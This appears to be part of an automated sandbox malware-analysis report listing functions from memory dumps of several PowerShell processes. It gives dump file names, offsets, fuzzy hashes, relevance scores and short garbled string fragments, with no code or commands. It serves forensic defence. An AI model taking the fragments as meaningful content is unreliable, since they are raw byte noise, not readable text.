Source File: 0000000E.00000002.1835983417.00007FF887E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff887e20000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f7660fbffbed2b80ae1422a654932b779e987fd4638da6cdcd1c30995fe5dae
Instruction ID: a089918599087f6b64379aa9aacb884a6bf25566625e7259ad2346ec4776d764
Opcode Fuzzy Hash: 3f7660fbffbed2b80ae1422a654932b779e987fd4638da6cdcd1c30995fe5dae
Instruction Fuzzy Hash: A9F09A32A4CA088FE758EA4CE8018A873E0FF5536072140BAE01DC75A3CA29EC45C741

Function 00007FF887E24400 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.1835983417.00007FF887E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff887e20000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5cfe6e9dbb1dbfa4902fbdc0fb31014d543469f321557d3edfce1fba0f4b5199
Instruction ID: a838b1a1fdae739aabe2124e8e216d6529b9fa36ff28a73e3bd0712f1c932651
Opcode Fuzzy Hash: 5cfe6e9dbb1dbfa4902fbdc0fb31014d543469f321557d3edfce1fba0f4b5199
Instruction Fuzzy Hash: DFF0B832A4C6448FE758EA4CE8418ACB7F0FF06720B2100B6E01DCB4A3DA2AAC55C750

Function 00007FF887E241D1 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.1835983417.00007FF887E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff887e20000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
Instruction ID: 0725b66e5d95a782a091e5d3ed8802c2f20a4875e29ad6b9ee4f9fa44a7478a8
Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
Instruction Fuzzy Hash: B6E01A31B5C8088FEB68DA0CE0409AD73E1FB9936172101B7E14EC7962CA26EC51CB80

Non-executed Functions

Function 00007FF887D506A0 Relevance: 10.2, Strings: 8, Instructions: 170COMMON

Download Yara Rule

Strings

P/_, xrefs: 00007FF887D50701
/_, xrefs: 00007FF887D506D1
], xrefs: 00007FF887D5074C
(0_, xrefs: 00007FF887D50731
H1_, xrefs: 00007FF887D506C1
-_, xrefs: 00007FF887D50751
p0_, xrefs: 00007FF887D506F1
8,_, xrefs: 00007FF887D50711

Memory Dump Source

Source File: 0000000E.00000002.1833788819.00007FF887D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff887d50000_powershell.jbxd

Similarity

API ID:
String ID: (0_$8,_$H1_$P/_$]$p0_$-_$/_
API String ID: 0-2624468954
Opcode ID: 92723b222080ea3cad509ff8f0a68f150effa2c786a3282c6a1d2f6f08786e51
Instruction ID: 57087fb75083ffde8b21b2e58073e2903d4e01b400d3dcb0b3cfb1a5360e8060
Opcode Fuzzy Hash: 92723b222080ea3cad509ff8f0a68f150effa2c786a3282c6a1d2f6f08786e51
Instruction Fuzzy Hash: 9051F062D8EAC2DFF3164774181917CAFB1FF62690B5842FBC0A94B0DBDD069819C785

Function 00007FF887D58BF2 Relevance: 10.1, Strings: 8, Instructions: 85COMMON

Download Yara Rule

Strings

K_^J, xrefs: 00007FF887D58C62
K_^K, xrefs: 00007FF887D58C6A
K_^Y, xrefs: 00007FF887D58CBA
K_^N, xrefs: 00007FF887D58C72
K_^?, xrefs: 00007FF887D58C2A
K_^Q, xrefs: 00007FF887D58C8A
K_^8, xrefs: 00007FF887D58BF2
K_^<, xrefs: 00007FF887D58C12

Memory Dump Source

Source File: 0000000E.00000002.1833788819.00007FF887D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff887d50000_powershell.jbxd

Similarity

API ID:
String ID: K_^8$K_^<$K_^?$K_^J$K_^K$K_^N$K_^Q$K_^Y
API String ID: 0-2350917820
Opcode ID: 4d511a56c9d75752d4573350cecfee82ab797f1e65113e8d56fb972c6edfed05
Instruction ID: 801febb3812832c273fdb5bc989536bf9a3f500f6f46bf7f74506b518dbe3375
Opcode Fuzzy Hash: 4d511a56c9d75752d4573350cecfee82ab797f1e65113e8d56fb972c6edfed05
Instruction Fuzzy Hash: 6821F6B3A085195ACB0236BDF8816EC77A1EF553B834502F3E02DDF113DD18A58B8A91

Function 00007FF887D502AD Relevance: 6.5, Strings: 5, Instructions: 224COMMON

Download Yara Rule

Strings

p@s, xrefs: 00007FF887D50419
], xrefs: 00007FF887D504CC
x._, xrefs: 00007FF887D503D9
@J_, xrefs: 00007FF887D50491
dA, xrefs: 00007FF887D50399

Memory Dump Source

Source File: 0000000E.00000002.1833788819.00007FF887D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff887d50000_powershell.jbxd

Similarity

API ID:
String ID: dA$@J_$]$p@s$x._
API String ID: 0-76705859
Opcode ID: 94e6033c273cf4b12615bcdb4d7532dc7fd05c277cd46bdd1938a058dbbc3edf
Instruction ID: acd079936ba1ea0c7101f351e0be5ed854d7610a572f9a9fd369df3651840b52
Opcode Fuzzy Hash: 94e6033c273cf4b12615bcdb4d7532dc7fd05c277cd46bdd1938a058dbbc3edf
Instruction Fuzzy Hash: 5F711262C4FAC1CFF32A4A78281917C6EB1BF12680B9C01FBC0994B0DFE9559D19C345

Analysis Process: powershell.exePID: 1020, Parent PID: 7732COMMON

Executed Functions

Function 00007FF887E16660 Relevance: .4, Instructions: 394COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1826815255.00007FF887E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff887e10000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f74f8fd57ee9614562f7aa5d817e9411027c1776827280705312cca201203ef
Instruction ID: 40b357d4a9a69065ffc30cb26eec70a9099b5dbe77fed1ef314c7a33d1ee8294
Opcode Fuzzy Hash: 9f74f8fd57ee9614562f7aa5d817e9411027c1776827280705312cca201203ef
Instruction Fuzzy Hash: BAC11431D4DA8A8FE7A6AF6858165BD7BE1FF46B91B1401BED40DCB083DE1CA805C361

Function 00007FF887D4A828 Relevance: .2, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1824537519.00007FF887D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff887d40000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7117f37ff16e225219123140aa76956c217e832147e7e94c589f9ab2c98d203b
Instruction ID: 4ecd04442ec59358a88fd76f7465db469669eb613b93b7857be17f145309b829
Opcode Fuzzy Hash: 7117f37ff16e225219123140aa76956c217e832147e7e94c589f9ab2c98d203b
Instruction Fuzzy Hash: D0513631A4CA854FE38ADB28CC955687BF0FF96354B1802BED48ACB1D7EE15A807C745

Function 00007FF887C2ED40 Relevance: .1, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1822273284.00007FF887C2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C2D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff887c2d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 22622c573d40268b591f700cf19ca4c6dcd40de047d43ad6a8e2d7491a362930
Instruction ID: 27b5dbaf7fa5737f7c46bc3d27f13bc6459f3dfbd111acaa968bd674ee9bb6b8
Opcode Fuzzy Hash: 22622c573d40268b591f700cf19ca4c6dcd40de047d43ad6a8e2d7491a362930
Instruction Fuzzy Hash: 1741003040DBC45FE7569B28D8559623FF1FF57360B1906DFD088CB1A3D629A84AC7A2

Function 00007FF887D4A73C Relevance: .1, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1824537519.00007FF887D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff887d40000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc8c46be30f47b73c914c6a066df96a0e452649d91e8eb979bed765883164ace
Instruction ID: 1d84d1e142a210759420a19c2a92776907e6165c84183d7b9df0a4fb27f5c87b
Opcode Fuzzy Hash: cc8c46be30f47b73c914c6a066df96a0e452649d91e8eb979bed765883164ace
Instruction Fuzzy Hash: 7A31F83194DB884FDB59DB6898496E97FF0FFA6320F0441AFC049C7153D6645806CB52

Function 00007FF887D433B5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1824537519.00007FF887D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff887d40000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
Instruction ID: 5b75784d4932cbf52903e89cf688f523059bf7730c4ababde96d3da05b2be3b7
Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
Instruction Fuzzy Hash: 2C01A73114CB0C4FD744EF0CE051AA9B3E0FB85360F10052DE58AC3651DA36E882CB42

Function 00007FF887D4A0FB Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1824537519.00007FF887D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff887d40000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 152c30cbff3826d2e2b7f6a1c1e33fad8618abb8b595b48cb12e760310e8fb08
Instruction ID: 25100d233344dfda111503bc280413dcfe814d154a36f70679086f619c6441a5
Opcode Fuzzy Hash: 152c30cbff3826d2e2b7f6a1c1e33fad8618abb8b595b48cb12e760310e8fb08
Instruction Fuzzy Hash: 91F0FC7658898D4FD782DF2CDC590E87FB0FFA5241B0401ABE449C7092E7218409C7C1

Function 00007FF887E1414D Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1826815255.00007FF887E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff887e10000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 77c6628e04e16379b24dfcacd932c8202fc662a7d4e7861e09f34e332d319352
Instruction ID: 8266dbd5b0d794a6e49ddd589c82eeb6ab0d2ed164d27f13aa5f1a39c501f339
Opcode Fuzzy Hash: 77c6628e04e16379b24dfcacd932c8202fc662a7d4e7861e09f34e332d319352
Instruction Fuzzy Hash: 7EF09031A4C5058FD798DA4CE4014A873E0FF5536172240B6E01DC7663CA29EC45C751

Function 00007FF887E14400 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1826815255.00007FF887E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff887e10000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ce7bc5d48eb987701467f7943178399b16da9dcce819f7cf07d96be06a3c5b73
Instruction ID: 405dde61bdae551c3e20cb906ddea0fe0a2808859ec3cbfed8297c40c861611a
Opcode Fuzzy Hash: ce7bc5d48eb987701467f7943178399b16da9dcce819f7cf07d96be06a3c5b73
Instruction Fuzzy Hash: 0CF0BE31A4C5448FE794EB4CE4428AC73F0FF0572171100B6E01DC7553DA29AC55C760

Function 00007FF887E141D1 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1826815255.00007FF887E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff887e10000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
Instruction ID: 7d1fd6164339a85354eaac2052dfe35a48c907795c44331892bcea9503b24e69
Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
Instruction Fuzzy Hash: EBE0123174C405CFD6A8DA0CE0419ED73E1FB9936172101B7D15EC7661C625EC91CB90

Non-executed Functions

Function 00007FF887D48BD3 Relevance: 7.6, Strings: 6, Instructions: 146COMMON

Download Yara Rule

Strings

L_^Y, xrefs: 00007FF887D48CAA
L_^5, xrefs: 00007FF887D48BC9
L_^N, xrefs: 00007FF887D48C62
L_^@, xrefs: 00007FF887D48C22
L_^4, xrefs: 00007FF887D48BC2
L_^U, xrefs: 00007FF887D48C8A

Memory Dump Source

Source File: 00000010.00000002.1824537519.00007FF887D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff887d40000_powershell.jbxd

Similarity

API ID:
String ID: L_^4$L_^5$L_^@$L_^N$L_^U$L_^Y
API String ID: 0-3939689582
Opcode ID: a0b19e4223c0868700c156260f9fe179b63fe9574ae263aaa0fe37affc383703
Instruction ID: 39957dd05d68131eccaf9d93604e79d168eeb8282b798714a2b295c73d30f3a0
Opcode Fuzzy Hash: a0b19e4223c0868700c156260f9fe179b63fe9574ae263aaa0fe37affc383703
Instruction Fuzzy Hash: E83115B7B085290AC30136FDF8822ED3750EF952B674452B7D39DCB053CE29608B86E2

Function 00007FF887D402AD Relevance: 6.5, Strings: 5, Instructions: 221COMMON

Download Yara Rule

Strings

x._, xrefs: 00007FF887D403D9
p@s, xrefs: 00007FF887D40419
], xrefs: 00007FF887D404CC
@J_, xrefs: 00007FF887D40491
dA, xrefs: 00007FF887D40399

Memory Dump Source

Source File: 00000010.00000002.1824537519.00007FF887D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff887d40000_powershell.jbxd

Similarity

API ID:
String ID: dA$@J_$]$p@s$x._
API String ID: 0-76705859
Opcode ID: d6b9bbf6f2827fe0f101ce95209d3e72c8b16fb9019527980e07f95d570b16d6
Instruction ID: c1b7d10ce88c8dede27c38c5a1cf0fc170e12fe7274c831d87edfa10b00bb55b
Opcode Fuzzy Hash: d6b9bbf6f2827fe0f101ce95209d3e72c8b16fb9019527980e07f95d570b16d6
Instruction Fuzzy Hash: 48711462D8EAC14FE3974AB868191BC6EB1BF92680B9841FBC09D4B0DFE9459D19C341

Function 00007FF887D489F2 Relevance: 6.4, Strings: 5, Instructions: 112COMMON

Download Yara Rule

Strings

L_^, xrefs: 00007FF887D489F2
L_^, xrefs: 00007FF887D48A7A
L_^, xrefs: 00007FF887D48A6A
L_^, xrefs: 00007FF887D48A12
L_^, xrefs: 00007FF887D48AC9

Memory Dump Source

Source File: 00000010.00000002.1824537519.00007FF887D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff887d40000_powershell.jbxd

Similarity

API ID:
String ID: L_^$L_^$L_^$L_^$L_^
API String ID: 0-205492149
Opcode ID: 2e99249bb0eb2b0300122dc0eeecea234c5e5dabf88e425ce057a8119ee729de
Instruction ID: 66b4b1778ee3ed1f681688350a880cd356acc975a6f7ed25a9649bdf9cf94e6e
Opcode Fuzzy Hash: 2e99249bb0eb2b0300122dc0eeecea234c5e5dabf88e425ce057a8119ee729de
Instruction Fuzzy Hash: A63197A3A8D9D30FE39742198CA60AD6FB1FFA22D8B0D42F6C1C58F0D7EE5458078151

Analysis Process: powershell.exePID: 2188, Parent PID: 7732COMMON

Executed Functions

Function 00007FF887D3B9FA Relevance: 3.4, Strings: 2, Instructions: 947COMMON

Download Yara Rule

Strings

UR_H, xrefs: 00007FF887D3BCF0
6B, xrefs: 00007FF887D3C09C

Memory Dump Source

Source File: 00000012.00000002.2092619762.00007FF887D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff887d30000_powershell.jbxd

Similarity

API ID:
String ID: 6B$UR_H
API String ID: 0-3568712714
Opcode ID: 360ae2afb8a643a7706046ac5ffd5c46d97fd06dd02ac2459065440f428140ae
Instruction ID: d4e5b276da7bee180dd48bda194d509807ec4b43a594d2260b42dbc615d887ac
Opcode Fuzzy Hash: 360ae2afb8a643a7706046ac5ffd5c46d97fd06dd02ac2459065440f428140ae
Instruction Fuzzy Hash: D5521831A4CA8A8FEB45DB1CC855ABD7BF1FF55354F1402BAC44EC719BEA24A842C781

Function 00007FF887E06660 Relevance: .4, Instructions: 400COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.2094146570.00007FF887E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887E00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff887e00000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aeea4a4af50561ef121da1d17d414fc8691b68c4639c4b5e626d8b7ff7cd57cc
Instruction ID: b30cdcca524ebe4b2531a297b87168da76baae4f4e087fb79b910ce82ef7e70f
Opcode Fuzzy Hash: aeea4a4af50561ef121da1d17d414fc8691b68c4639c4b5e626d8b7ff7cd57cc
Instruction Fuzzy Hash: B3C10331D4DA8A8FE7A5EB6858156BD7BF1FF46B94B0801BED40DCB093D92CA805C351

Function 00007FF887D3A7EC Relevance: .2, Instructions: 236COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.2092619762.00007FF887D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff887d30000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 037d27cf1861832f10738b49052e5b8a7e8c6415888c90cea2168e7e74c53559
Instruction ID: 5679145eb1c59a9c6aab423623251ee350eb4152228a9a6aedd0405053d2c06a
Opcode Fuzzy Hash: 037d27cf1861832f10738b49052e5b8a7e8c6415888c90cea2168e7e74c53559
Instruction Fuzzy Hash: DC610731A4DB864FE34ADA288CA54787BF0FF9635471802BED48ACB197FD19A807C751

Function 00007FF887D39F65 Relevance: .2, Instructions: 203COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.2092619762.00007FF887D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff887d30000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5cc0fb306f06ba30a899db2818a3d85535797b79c446f9e80e061d363b54aba2
Instruction ID: c1425a9cdea577bcc39bca9bc579ce163d4532a02dc3cf97458f56c0ddbaae7e
Opcode Fuzzy Hash: 5cc0fb306f06ba30a899db2818a3d85535797b79c446f9e80e061d363b54aba2
Instruction Fuzzy Hash: 5F51C873E4999B4FE702976C9C660EC3BA0FFA2269B0C03B2D49D8F097FD1954178691

Function 00007FF887D39738 Relevance: .1, Instructions: 142COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.2092619762.00007FF887D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff887d30000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9052058ba27cdd788d744543baba28bbc395bca24088e127a05cc088f29790a3
Instruction ID: 0160077713eef705cba5f74530508c2b0cc1b49260032e74cd1f68ed58673aab
Opcode Fuzzy Hash: 9052058ba27cdd788d744543baba28bbc395bca24088e127a05cc088f29790a3
Instruction Fuzzy Hash: F441FA71D0CA498FE7589F5CA8066FD7BE0FB65715F00426FE04993296DA20A816C7C2

Function 00007FF887C1EAA8 Relevance: .1, Instructions: 122COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.2091056443.00007FF887C1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff887c1d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3af16b196e29d1ab6fc1bc8c1a75330942882030cb1919bda94669fb664202e8
Instruction ID: 471e19c8df6e17e4c4bf35c50e499851107f39b979dd820c7b6a454508820e50
Opcode Fuzzy Hash: 3af16b196e29d1ab6fc1bc8c1a75330942882030cb1919bda94669fb664202e8
Instruction Fuzzy Hash: 4541047140DBC44FD756DB38D8559523FB0FF53260B1506EFD088CB1A7D625A84AC7A2

Function 00007FF887D3A47C Relevance: .1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.2092619762.00007FF887D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff887d30000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b89b8dc8ca459aae01df53a30c179be92af1ee45b182b196c5704f0df1b9a4a
Instruction ID: 28d30da0606bed9f6ad2726b7fd9a902f646e93b7159d6e8937dda245164e3af
Opcode Fuzzy Hash: 2b89b8dc8ca459aae01df53a30c179be92af1ee45b182b196c5704f0df1b9a4a
Instruction Fuzzy Hash: B121063190C74C8FEB59DBAC984A7E97BF0EB96321F04426BD049C3156DA74A41ACB92

Function 00007FF887E0345C Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.2094146570.00007FF887E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887E00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff887e00000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 357adb6803d7be79fac95018f79ad2508dc516b4eb58be62b6120bd537d94a47
Instruction ID: 0b6aa53b84e1cecb5d7c20b3ffc76e92116f49c937f203ddf10e559d76465fa1
Opcode Fuzzy Hash: 357adb6803d7be79fac95018f79ad2508dc516b4eb58be62b6120bd537d94a47
Instruction Fuzzy Hash: 03215421A4CBC90FE7AACA1E58942783BE1FF66360B0800BFC48DCB193DC299C04C301

Function 00007FF887D333B5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.2092619762.00007FF887D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff887d30000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
Instruction ID: daa0ff8f57224b30d5b3a69f55305c2e0c4bda254689e9a8e272a9959e17915d
Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
Instruction Fuzzy Hash: 4C01A73110CB0C4FD744EF0CE051AA9B3E0FB85360F10052DE58AC3651DA36E882CB42

Function 00007FF887E0414D Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.2094146570.00007FF887E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887E00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff887e00000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d9be592e21d396ab1543db15efebe7ce9dff073afaa01fdf7300c02c3ca7e790
Instruction ID: 0b820259034de794b7a488b40aa5d61523282874e6d2c2a5e67c8ed856af504a
Opcode Fuzzy Hash: d9be592e21d396ab1543db15efebe7ce9dff073afaa01fdf7300c02c3ca7e790
Instruction Fuzzy Hash: D9F09A32A4CA048FD758EA4CE4008A877E0FF5A36072100FAE11DC75A3CA29EC44C741

Function 00007FF887E04400 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.2094146570.00007FF887E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887E00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff887e00000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ddf2fe482333fe15bf1291ce06b2fc6d900fec9596c7b77c79d43e913ab99ff7
Instruction ID: fa7b532a97a0a5c419de6c6249b6fc5c3eae5043bc044de5d85948398d26ecbc
Opcode Fuzzy Hash: ddf2fe482333fe15bf1291ce06b2fc6d900fec9596c7b77c79d43e913ab99ff7
Instruction Fuzzy Hash: BCF0B832A4C6448FE758EA4CE4408AC77F0FF0A720B5100F6E11DCB4A3DA2AAC54C751

Function 00007FF887E041D1 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.2094146570.00007FF887E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887E00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff887e00000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
Instruction ID: 389eef69e47aaf2397c4d42e4ea33376506c8ba95024dfde57af40aadd18df55
Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
Instruction Fuzzy Hash: 89E01A31B4C8099FDA68DA0CE1409AD73E1FB9A36176101BBD14EC7962CA26EC51CB80

Non-executed Functions

Function 00007FF887D38995 Relevance: 5.2, Strings: 4, Instructions: 155COMMON

Download Yara Rule

Strings

M_^, xrefs: 00007FF887D38A6A
M_^, xrefs: 00007FF887D38AC2
M_^, xrefs: 00007FF887D389C9
M_^, xrefs: 00007FF887D38A2A

Memory Dump Source

Source File: 00000012.00000002.2092619762.00007FF887D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff887d30000_powershell.jbxd

Similarity

API ID:
String ID: M_^$M_^$M_^$M_^
API String ID: 0-1397233021
Opcode ID: 31e9ae425a43e887e9d4d43e34db68dd59682c1bf2e54313d523f29983224e67
Instruction ID: 2298c5ee6880425f822ef34a007ed1859e75944e4f3639fd1296e86317a19f91
Opcode Fuzzy Hash: 31e9ae425a43e887e9d4d43e34db68dd59682c1bf2e54313d523f29983224e67
Instruction Fuzzy Hash: A54142A294DAD35FF35786684CA50A97FB0FF52294B0D43F6C099CB0D7F9185407C261

Function 00007FF887D38BFA Relevance: 5.1, Strings: 4, Instructions: 85COMMON

Download Yara Rule

Strings

M_^J, xrefs: 00007FF887D38C8A
M_^F, xrefs: 00007FF887D38C7A
M_^4, xrefs: 00007FF887D38BFA
M_^7, xrefs: 00007FF887D38C12

Memory Dump Source

Source File: 00000012.00000002.2092619762.00007FF887D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ff887d30000_powershell.jbxd

Similarity

API ID:
String ID: M_^4$M_^7$M_^F$M_^J
API String ID: 0-622050427
Opcode ID: 72fae20d2bac252b730584b67fdb1a6b21fbfe3d418bd6e58b9d6ffda6c8f105
Instruction ID: 77ecf0fcaeeb1016aecb7c940c5a2843095bfff3a094b78aea33b15f6479d6e8
Opcode Fuzzy Hash: 72fae20d2bac252b730584b67fdb1a6b21fbfe3d418bd6e58b9d6ffda6c8f105
Instruction Fuzzy Hash: F921D7B7A085699ED3027BBDB8046DD3750DF952B478507B2E1AECB093F91860878AE1

Analysis Process: powershell.exePID: 4080, Parent PID: 7732COMMON

Executed Functions

Function 00007FF887DF6605 Relevance: .4, Instructions: 434COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2405962633.00007FF887DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff887df0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d65e5ffef339b4b9aabe441026468cc270f1687afbfb65879a0a5b914d69a04
Instruction ID: dcbe4752d82c3ceeb1eab8dafc254d6be79f6f5bd5440fc248324584ee532b07
Opcode Fuzzy Hash: 6d65e5ffef339b4b9aabe441026468cc270f1687afbfb65879a0a5b914d69a04
